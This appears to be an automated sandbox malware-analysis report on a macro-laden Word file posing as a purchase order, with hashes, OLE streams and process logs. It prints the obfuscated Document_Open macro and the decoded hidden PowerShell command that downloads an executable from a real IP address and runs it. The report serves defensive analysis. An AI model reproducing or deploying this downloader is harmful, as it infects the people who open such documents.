    SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
    Malicious:false
    Reputation:high, very likely benign file
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I7C5FUJQ0Y2PXWT9C5J1.temp
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):8016
    Entropy (8bit):3.5831418784386364
    Encrypted:false
    SSDEEP:96:chQCsMq9qvsqvJCwoqz8hQCsMq9qvsEHyqvJCworAzkCYmHRf8RclUV0Iu:cyEoqz8yQHnorAzkaf8RMIu
    MD5:AE7F4F39A8FB3D1513F9CBA8587E85F4
    SHA1:6A111BF9B998A9BD2796ED34621D5397E088ECF3
    SHA-256:A533B3DF7EC827E302410D7A5A22D281AA47136D33DA83DE44010FCDD391DDC9
    SHA-512:6316B6B68A31DE8AAD6B91E98092285B53D928685D1996DBB637073D9D35FBC9973970D92195F226F116A33F1B37A84E835167FE9807043B66B85A5F7F73AD3A
    Malicious:false
    Reputation:low
    C:\Users\user\Desktop\~$L_PO 69002.doc
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.431160061181642
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
    MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
    SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
    SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
    SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
    Malicious:false
    Reputation:high, very likely benign file

    Static File Info

    General

    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dell, Template: Normal.dotm, Last Saved By: Dell, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Jun 10 09:54:00 2021, Last Saved Time/Date: Thu Jun 10 09:55:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
    Entropy (8bit):7.856503203160727
    TrID:
    • Microsoft Word document (32009/1) 54.23%
    • Microsoft Word document (old ver.) (19008/1) 32.20%
    • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
    File name:RFL_PO 69002.doc
    File size:426496
    MD5:ee4431e2c986dcac3fc8078c674ba65e
    SHA1:64aa75122963e38f52739ba819788e4bfcfb3651
    SHA256:4219dd0fbae4f8d9e9964eac82293fefc6a7f1b75242473f6347daed349198a2
    SHA512:6de5ce6da2e111931a2dc40ded7b23c2754503b4340b0492ce68ff0480b0e3727f0697a1772ef106e194194e9e0d96916efe6296e8963819544d2d2effdfb618
    SSDEEP:12288:hlhcQMEUElwvXxKDe2YqREMm1vRm3d+QxHd5NK:vXUvvXSe27etQ3dv9m

    File Icon

    Icon Hash:e4eea2aaa4b4b4a4

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "RFL_PO 69002.doc"

    Indicators

    Has Summary Info:True
    Application Name:Microsoft Office Word
    Encrypted Document:False
    Contains Word Document Stream:True
    Contains Workbook/Book Stream:False
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Code Page:1252
    Title:
    Subject:
    Author:Dell
    Keywords:
    Comments:
    Template:Normal.dotm
    Last Saved By:Dell
    Revision Number:5
    Total Edit Time:60
    Create Time:2021-06-10 08:54:00
    Last Saved Time:2021-06-10 08:55:00
    Number of Pages:1
    Number of Words:0
    Number of Characters:1
    Creating Application:Microsoft Office Word
    Security:0

    Document Summary

    Document Code Page:1252
    Number of Lines:1
    Number of Paragraphs:1
    Thumbnail Scaling Desired:False
    Company:
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:983040

    Streams with VBA

    VBA File Name: Module1.bas, Stream Size: 993
    General
    Stream Path:Macros/VBA/Module1
    VBA File Name:Module1.bas
    Stream Size:993

    VBA Code Keywords

    Keyword
    physicaldark()
    Attribute
    VB_Name
    Macro
    physicaldark
    VBA Code
    Attribute VB_Name = "Module1"
    Sub physicaldark()
    '
    ' physicaldark Macro
    ' 1Y9EPHD78LD1
    '
    End Sub
    VBA File Name: ThisDocument.cls, Stream Size: 1786
    General
    Stream Path:Macros/VBA/ThisDocument
    VBA File Name:ThisDocument.cls
    Stream Size:1786

    VBA Code Keywords

    Keyword
    ";C:\Users\Public\Documents\nothinglittle.ex"
    -Destination
    "C:\Users\Public\Documents\nothinglittle.ex"
    VB_Name
    VB_Creatable
    CreateObject("wscript.s"
    VB_Exposed
    calllife).Run(insidewith
    rememberhead
    Start-Bit"
    "hell"
    VB_Customizable
    -Source
    "Transfer
    insidewith
    Document_Open()
    VB_TemplateDerived
    "ThisDocument"
    False
    Attribute
    Private
    VB_PredeclaredId
    VB_GlobalNameSpace
    "powers"
    VB_Base
    calllife
    VBA Code
    Attribute VB_Name = "ThisDocument"
    Attribute VB_Base = "1Normal.ThisDocument"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    insidewith = "powers"
    calllife = "hell"
    rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
    End Sub

    Streams

    Stream Path: \x1CompObj, File Type: data, Stream Size: 114
    General
    Stream Path:\x1CompObj
    File Type:data
    Stream Size:114
    Entropy:4.2359563651
    Base64 Encoded:True
    Data ASCII (decoded, non-printable bytes omitted):Microsoft Word 97-2003 Document | MSWordDoc | Word.Document.8
    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5DocumentSummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.243799209562
    Base64 Encoded:False
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5SummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.45311151175
    Base64 Encoded:False
    Stream Path: 1Table, File Type: data, Stream Size: 6987
    General
    Stream Path:1Table
    File Type:data
    Stream Size:6987
    Entropy:5.8885032044
    Base64 Encoded:True
    Stream Path: Data, File Type: data, Stream Size: 392814
    General
    Stream Path:Data
    File Type:data
    Stream Size:392814
    Entropy:7.9926896989
    Base64 Encoded:True
    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 410
    General
    Stream Path:Macros/PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:410
    Entropy:5.35778177907
    Base64 Encoded:True
    Data ASCII (decoded, CRLF shown as " | "):ID="{5D65F43D-270A-483B-8FA4-CB6DD3F5BD6D}" | Document=ThisDocument/&H00000000 | Module=Module1 | Name="Project" | HelpContextID="0" | VersionCompatible32="393222000" | CMG="2B290B6A2A6E2A6E2A6E2A6E" | DPB="4E4C6E4FB251D452D452D4" | GC="717351925292526D" | [Host (truncated)
    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 65
    General
    Stream Path:Macros/PROJECTwm
    File Type:data
    Stream Size:65
    Entropy:3.27802992751
    Base64 Encoded:False
    Data ASCII (decoded):ThisDocument | ThisDocument (UTF-16) | Module1 | Module1 (UTF-16)
    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2592
    General
    Stream Path:Macros/VBA/_VBA_PROJECT
    File Type:data
    Stream Size:2592
    Entropy:4.11036825962
    Base64 Encoded:False
    Data ASCII (decoded from UTF-16):*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL#Visual Basic (truncated)
    Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 562
    General
    Stream Path:Macros/VBA/dir
    File Type:data
    Stream Size:562
    Entropy:6.329417886
    Base64 Encoded:True
    Stream Path: WordDocument, File Type: data, Stream Size: 4096
    General
    Stream Path:WordDocument
    File Type:data
    Stream Size:4096
    Entropy:1.04528425699
    Base64 Encoded:False

    Network Behavior

    No network behavior found


    System Behavior

    General

    Start time: 07:35:29
    Start date: 11/06/2021
    Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit): false
    Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
    Imagebase: 0x13f380000
    File size: 1424032 bytes
    MD5 hash: 95C38D04597050285A18F66039EDB456
    Has elevated privileges: true
    Has administrator privileges: true
    Programmed in: C, C++ or other language
    Reputation: high

    General

    Start time: 07:35:30
    Start date: 11/06/2021
    Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit): false
    Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe
    Imagebase: 0x13f610000
    File size: 473600 bytes
    MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
    Has elevated privileges: true
    Has administrator privileges: true
    Programmed in: .Net C# or VB.NET
    Reputation: high

    Disassembly

    Code Analysis

    Module: Module1

    Declaration
    Line 1: Attribute VB_Name = "Module1"

    Non-Executed Functions
    Line 2: Sub physicaldark()
    Line 7: End Sub

    Module: ThisDocument

    Declaration
    Line 1: Attribute VB_Name = "ThisDocument"
    Line 2: Attribute VB_Base = "1Normal.ThisDocument"
    Line 3: Attribute VB_GlobalNameSpace = False
    Line 4: Attribute VB_Creatable = False
    Line 5: Attribute VB_PredeclaredId = True
    Line 6: Attribute VB_Exposed = True
    Line 7: Attribute VB_TemplateDerived = True
    Line 8: Attribute VB_Customizable = True

    Executed Functions
    API: Run
      Meta Information: IWshShell3.Run("powershell -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/RFL_0769002.exe" -Destination "C:\Users\Public\Documents\nothinglittle.exe";C:\Users\Public\Documents\nothinglittle.exe") -> 0
    API: Chr
      Decrypted Strings: "powers", "hell", "wscript.s"

    Line 9: Private Sub Document_Open()
    Line 10: insidewith = "powers"
      Meta Information: executed
    Line 11: calllife = "hell"
    Line 12: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
      Meta Information:
        IWshShell3.Run("powershell -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/RFL_0769002.exe" -Destination "C:\Users\Public\Documents\nothinglittle.exe";C:\Users\Public\Documents\nothinglittle.exe") -> 0
        Chr
        executed
    Line 13: End Sub
